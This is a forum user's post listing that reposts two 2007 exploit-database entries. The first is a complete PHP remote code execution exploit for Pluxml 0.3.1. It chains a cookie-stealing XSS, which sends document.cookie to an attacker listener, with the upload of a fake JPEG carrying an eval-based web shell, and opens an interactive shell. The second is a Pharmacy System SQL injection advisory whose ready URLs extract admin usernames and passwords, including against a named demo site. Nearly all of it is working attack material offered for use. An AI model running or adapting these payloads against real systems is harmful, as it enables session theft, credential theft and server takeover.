Jump to content

hex

Members
  • Posts

    43
  • Joined

  • Last visited

Everything posted by hex

  1. <?php # C:\> sploit.php -url http://victim.com/pluxml0.3.1/ -ip 90.27.10.196 # [/]Waiting for connection on http://90.27.10.196:80/ # [!]Now you have to make the victim to click on the url # [+]Received 395 bytes from 182.26.54.2:2007 # [+]Sending 366 bytes to 182.26.54.2:2007 # [+]Received 326 bytes from 182.26.54.2:2009 # [+]Sending 366 bytes to 182.26.54.2:2009 # [+]Received 692 bytes from 182.26.54.2:2010 # [!]Received one cookie from 182.26.54.2:2010 # [/]Verifying if there is a valid session id cookie # [-]No: pollvote=1 # [!]Yes: PHPSESSID=c6255827c1a07c51a95af691a612484b # [+]The created socket has been shut down # $shell> whoami # darkfig # if($argc < 5) { print(" ------------ Pluxml 0.3.1 Remote Code Execution Exploit ------------- --------------------------------------------------------------------- Credits: DarkFig <gmdarkfig@gmail.com> URL: acid-root.new.fr || mgsdl.free.fr IRC: #acidroot@irc.worldnet.net Note: Coded for fun 8) --------------------------------------------------------------------- Usage: $argv[0] -url <> -ip <> [Options] Params: -url For example http://victim.com/pluxml0.3.1/ -ip The IP that will be bound to the socket Options: -port The socket will listen on this port (default=80) -proxy If you wanna use a proxy <proxyhost:proxyport> -proxyauth Basic authentification <proxyuser:proxypwd> --------------------------------------------------------------------- ");exit(1); } # PhpSploit object #################### $xpl = new phpsploit(); $xpl->agent('Firefox'); # Server ########## $server_addr = getparam('ip',1); $server_port = (getparam('port')!='') ? getparam('port') : '80'; $server_url = "http://$server_addr:$server_port/"; # Victim ########## $hack = getparam('url',1); $html = "<h1>hello </h1>\n"; # Apparently my XSS bypass NoScript protection ################################################ $xss = "<iframe src='${hack}pluxml/admin/auth.php?msg=" ."<script>document.location=(".char($server_url.'?c=') .".concat(document.cookie))</script>'" ." height=0 width=0>"; # Socket ########## $handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_bind($handle, $server_addr, $server_port); socket_listen($handle); print "\n[/]Waiting for connection on $server_url"; print "\n[!]Now you have to make the victim to click on the url"; # Wait until we get admin rights ################################## while(TRUE) { $packet = ''; if(!$msg = socket_accept($handle)) exit(1); # End of the packet ? ###################### while(!ereg("\r\n\r\n",$packet)) $packet .= socket_read($msg, 2048, PHP_BINARY_READ); socket_getpeername($msg, $clientaddr, $clientport); print "\n[+]Received ".strlen($packet)." bytes from $clientaddr:$clientport"; # Server response ################## $serv = "HTTP 1.x 200 OK\r\n" ."Connection: close\r\n" ."Transfer-Encoding: chunked\r\n" ."Content-Type: text/html\r\n\r\n" .$html.$xss."\r\n\r\n"; # Is there a cookie ? ####################### if(preg_match("#\?c=(\S*) HTTP/1\.([01x]+)#", $packet, $cookies)) { print "\n[!]Received one cookie from $clientaddr:$clientport"; print "\n[/]Verifying if there is a valid session id cookie"; $cookie = explode(';%20',$cookies[1]); foreach($cookie as $session) { # Valid session id ? ####################### if(is_valid_session($session)) # Let's upload a file ####################### code_execution(); } print "\n[-]No valid session id cookie found"; print "\n[/]Always waiting for connection"; } # Answer to the client ######################## else { print "\n[+]Sending ".strlen($serv)." bytes to $clientaddr:$clientport"; socket_write($msg, $serv, strlen($serv)); } socket_close($msg); } # Function which is like getopt() ################################### function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("-$param parameter required"); else return; } # Bypass magic_quotes_gpc ########################### function char($data) { $char = 'String.fromCharCode('; for($i=0;$i<strlen($data);$i++) { $char .= ord($data[$i]); if($i != (strlen($data)-1)) $char .= ','; } return $char.')'; } # Admin session always available ? ################################### function is_valid_session($session) { global $xpl,$hack; $xpl->addheader('Cookie',$session); $xpl->get($hack.'pluxml/admin/index.php'); if(eregi('Location: auth.php', $xpl->getheader())) { print "\n[-]No: $session"; return FALSE; } else { print "\n[!]Yes: $session"; return TRUE; } } # File upload vulnerability ############################# function code_execution() { global $xpl,$hack,$msg; socket_close($msg); print "\n[+]The created socket has been shut down"; # +images.php [File Upload Vulnerability] # | # 11. if(!empty($_FILES)){ # 12. $uploaddir = '../../images/'; # 13. $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); # 14. if(getimagesize($_FILES['userfile']['tmp_name'])){ # 15. move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile); # 16. chmod($uploadfile, 0777); # 17. $msg = 'Image envoyée'; # 18. }else{ # 19. $msg = 'Le fichier n\'est pas une image'; # 20. } # 21. header('Location: images.php?msg='.$msg); # 22. } # # Fake JPG 1x1 # 000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse # 000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_ # 000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri # 000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011 # 000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV # 000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]); # 00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678 # 00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\>. # $fakejpg = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00" ."\x60\x00\x60\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06" ."\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B" ."\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20" ."\x24\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31" ."\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF" ."\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D\x0D\x18\x32" ."\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" ."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" ."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" ."\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00\x7F\x3C\x3F\x70" ."\x68\x70\x0D\x0A\x69\x66\x28\x69\x73\x73\x65\x74\x28\x24\x5F" ."\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45" ."\x4C\x4C\x5D\x29\x29\x0D\x0A\x7B\x0D\x0A\x70\x72\x69\x6E\x74" ."\x20\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31" ."\x32\x3B\x0D\x0A\x65\x76\x61\x6C\x28\x24\x5F\x53\x45\x52\x56" ."\x45\x52\x5B\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x5D\x29" ."\x3B\x0D\x0A\x70\x72\x69\x6E\x74\x20\x31\x32\x33\x34\x35\x36" ."\x37\x38\x39\x31\x30\x31\x31\x31\x32\x3B\x0D\x0A\x7D\x0D\x0A" ."\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00" ."\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01" ."\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02" ."\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00" ."\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D" ."\x01\x02\x03\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61" ."\x07\x22\x71\x14\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1\x15\x52" ."\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A\x25" ."\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45" ."\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64" ."\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83" ."\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99" ."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6" ."\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3" ."\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8" ."\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC4\x00" ."\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00" ."\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B" ."\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05" ."\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31" ."\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91" ."\xA1\xB1\xC1\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24" ."\x34\xE1\x25\xF1\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36" ."\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55" ."\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74" ."\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A" ."\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7" ."\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4" ."\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA" ."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7" ."\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00" ."\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9"; $formdata = array( frmdt_url => $hack.'pluxml/admin/images.php', 'userfile' => array( frmdt_filename => 'iwashere.php', frmdt_content => $fakejpg)); $xpl->formdata($formdata); print "\n\$shell> "; while(!preg_match('#^(quit|exit)$#', ($cmd = trim(fgets(STDIN))))) { # $shell> cat ../pluxml/conf/password.xml ######################################## $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($hack.'images/iwashere.php'); $content = explode('1.23456789101E+014',$xpl->getcontent()); print $content[1]."\n\$shell> "; } exit(0); } /* * * Copyright © darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 4 / PHP 5 * VERSION: 2.0 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * * [2007-06-10] (2.0) * * Code: Code optimization * * New: Compatible with PHP 4 by default * * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((| * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { var $proxyhost; var $proxyport; var $host; var $path; var $port; var $method; var $url; var $packet; var $proxyuser; var $proxypass; var $header; var $cookie; var $data; var $boundary; var $allowredirection; var $last_redirection; var $cookiejar; var $recv; var $cookie_str; var $header_str; var $server_content; var $server_header; /** * This function is called by the * get()/post()/formdata() functions. * You don't have to call it, this is * the main function. * * @access private * @return string $this->recv ServerResponse * */ function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = @fsockopen($this->proxyhost,$this->proxyport); else $socket = @fsockopen($this->host,$this->port); if(!$socket) die("Error: Host seems down"); if($this->method=='get') $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; elseif($this->method=='post' or $this->method=='formdata') $this->packet = 'POST '.$this->url." HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; if(!empty($this->header)) $this->packet .= $this->showheader(); if(!empty($this->cookie)) $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; $this->packet .= 'Host: '.$this->host."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method=='post') { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method=='formdata') { $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->getcookie(); if($this->allowredirection) return $this->getredirection(); else return $this->recv; } /** * This function allows you to add several * cookies in the request. * * @access public * @param string cookn CookieName * @param string cookv CookieValue * @example $this->addcookie('name','value') * */ function addcookie($cookn,$cookv) { if(!isset($this->cookie)) $this->cookie = array(); $this->cookie[$cookn] = $cookv; } /** * This function allows you to add several * headers in the request. * * @access public * @param string headern HeaderName * @param string headervalue Headervalue * @example $this->addheader('Client-IP', '128.5.2.3') * */ function addheader($headern,$headervalue) { if(!isset($this->header)) $this->header = array(); $this->header[$headern] = $headervalue; } /** * This function allows you to use an * http proxy server. Several methods * are supported. * * @access public * @param string proxy ProxyHost * @param integer proxyp ProxyPort * @example $this->proxy('localhost',8118) * @example $this->proxy('localhost:8118') * */ function proxy($proxy,$proxyp='') { if(empty($proxyp)) { $proxarr = explode(':',$proxy); $this->proxyhost = $proxarr[0]; $this->proxyport = (int)$proxarr[1]; } else { $this->proxyhost = $proxy; $this->proxyport = (int)$proxyp; } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an * http proxy server which requires a * basic authentification. Several * methods are supported: * * @access public * @param string proxyauth ProxyUser * @param string proxypass ProxyPass * @example $this->proxyauth('user','pwd') * @example $this->proxyauth('user:pwd'); * */ function proxyauth($proxyauth,$proxypass='') { if(empty($proxypass)) { $posvirg = strpos($proxyauth,':'); $this->proxyuser = substr($proxyauth,0,$posvirg); $this->proxypass = substr($proxyauth,$posvirg+1); } else { $this->proxyuser = $proxyauth; $this->proxypass = $proxypass; } } /** * This function allows you to set * the 'User-Agent' header. * * @access public * @param string useragent Agent * @example $this->agent('Firefox') * */ function agent($useragent) { $this->addheader('User-Agent',$useragent); } /** * This function returns the headers * which will be in the next request. * * @access public * @return string $this->header_str Headers * @example $this->showheader() * */ function showheader() { $this->header_str = ''; if(!isset($this->header)) return; foreach($this->header as $name => $value) $this->header_str .= $name.': '.$value."\r\n"; return $this->header_str; } /** * This function returns the cookies * which will be in the next request. * * @access public * @return string $this->cookie_str Cookies * @example $this->showcookie() * */ function showcookie() { $this->cookie_str = ''; if(!isset($this->cookie)) return; foreach($this->cookie as $name => $value) $this->cookie_str .= $name.'='.$value.'; '; return $this->cookie_str; } /** * This function returns the last * formed http request. * * @access public * @return string $this->packet HttpPacket * @example $this->showlastrequest() * */ function showlastrequest() { if(!isset($this->packet)) return; else return $this->packet; } /** * This function sends the formed * http packet with the GET method. * * @access public * @param string url Url * @return string $this->sock() * @example $this->get('localhost/index.php?var=x') * @example $this->get('http://localhost:88/tst.php') * */ function get($url) { $this->target($url); $this->method = 'get'; return $this->sock(); } /** * This function sends the formed * http packet with the POST method. * * @access public * @param string url Url * @param string data PostData * @return string $this->sock() * @example $this->post('http://localhost/','helo=x') * */ function post($url,$data) { $this->target($url); $this->method = 'post'; $this->data = $data; return $this->sock(); } /** * This function sends the formed http * packet with the POST method using * the multipart/form-data enctype. * * @access public * @param array array FormDataArray * @return string $this->sock() * @example $formdata = array( * frmdt_url => 'http://localhost/upload.php', * frmdt_boundary => '123456', # Optional * 'var' => 'example', * 'file' => array( * frmdt_type => 'image/gif', # Optional * frmdt_transfert => 'binary' # Optional * frmdt_filename => 'hello.php, * frmdt_content => '<?php echo 1; ?>')); * $this->formdata($formdata); * */ function formdata($array) { $this->target($array[frmdt_url]); $this->method = 'formdata'; $this->data = ''; if(!isset($array[frmdt_boundary])) $this->boundary = 'phpsploit'; else $this->boundary = $array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match('#^frmdt_(boundary|url)#',$key)) { $this->data .= str_repeat('-',29).$this->boundary."\r\n"; $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content * of the server response, without * the headers. * * @access public * @param string code ServerResponse * @return string $this->server_content * @example $this->getcontent() * @example $this->getcontent($this->get('http://localhost/')) * */ function getcontent($code='') { if(empty($code)) $code = $this->recv; $code = explode("\r\n\r\n",$code); $this->server_content = ''; for($i=1;$i<count($code);$i++) $this->server_content .= $code[$i]; return $this->server_content; } /** * This function returns the headers * of the server response, without * the content. * * @access public * @param string code ServerResponse * @return string $this->server_header * @example $this->getcontent() * @example $this->getcontent($this->post('http://localhost/','1=2')) * */ function getheader($code='') { if(empty($code)) $code = $this->recv; $code = explode("\r\n\r\n",$code); $this->server_header = $code[0]; return $this->server_header; } /** * This function is called by the * cookiejar() function. It adds the * value of the "Set-Cookie" header * in the "Cookie" header for the * next request. You don't have to * call it. * * @access private * @param string code ServerResponse * */ function getcookie() { foreach(explode("\r\n",$this->getheader()) as $header) { if(preg_match('/set-cookie/i',$header)) { $fequal = strpos($header,'='); $fvirgu = strpos($header,';'); // 12=strlen('set-cookie: ') $cname = substr($header,12,$fequal-12); $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); $this->cookie[trim($cname)] = trim($cvalu); } } } /** * This function is called by the * get()/post() functions. You * don't have to call it. * * @access private * @param string urltarg Url * @example $this->target('http://localhost/') * */ function target($urltarg) { if(!ereg('^http://',$urltarg)) $urltarg = 'http://'.$urltarg; $urlarr = parse_url($urltarg); $this->url = 'http://'.$urlarr['host'].$urlarr['path']; if(isset($urlarr['query'])) $this->url .= '?'.$urlarr['query']; $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; $this->host = $urlarr['host']; if($this->port != '80') $this->host .= ':'.$this->port; if(!isset($urlarr['path']) or empty($urlarr['path'])) die("Error: No path precised"); $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, * the script will extract all * 'Set-Cookie' headers values * and it will automatically add * them into the 'Cookie' header * for all next requests. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->cookiejar(0) * @example $this->cookiejar(1) * */ function cookiejar($code) { if($code=='0') $this->cookiejar=FALSE; elseif($code=='1') $this->cookiejar=TRUE; } /** * If you call this function, * the script will follow all * redirections sent by the server. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->allowredirection(0) * @example $this->allowredirection(1) * */ function allowredirection($code) { if($code=='0') $this->allowredirection=FALSE; elseif($code=='1') $this->allowredirection=TRUE; } /** * This function is called if * allowredirection() is enabled. * You don't have to call it. * * @access private * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) * @return string $this->get($this->last_redirection) * @return string $this->recv; * */ function getredirection() { if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) { $this->last_redirection = trim($codearr[2]); if(!ereg('://',$this->last_redirection)) return $this->get('http://'.$this->host.$this->path.$this->last_redirection); else return $this->get($this->last_redirection); } else return $this->recv; } /** * This function allows you * to reset some parameters. * * @access public * @param string func Param * @example $this->reset('header') * @example $this->reset('cookie') * @example $this->reset() * */ function reset($func='') { switch($func) { case 'header': $this->header = array(''); break; case 'cookie': $this->cookie = array(''); break; default: $this->cookiejar = ''; $this->header = array(''); $this->cookie = array(''); $this->allowredirection = ''; break; } } } ?> # milw0rm.com [2007-06-24]
  2. --==+================================================================================+==-- --==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SCRIPT DOWNLOAD: PAY SCRIPT SITE: http://www.netartmedia.net/pharmacysystem/ DORK: N/A EXPLOITS: EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users EXAMPLES: EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection if you cant do that then dont use the exploit. GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net --==+================================================================================+==-- --==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==-- --==+================================================================================+==-- # milw0rm.com [2007-06-24]
×
×
  • Create New...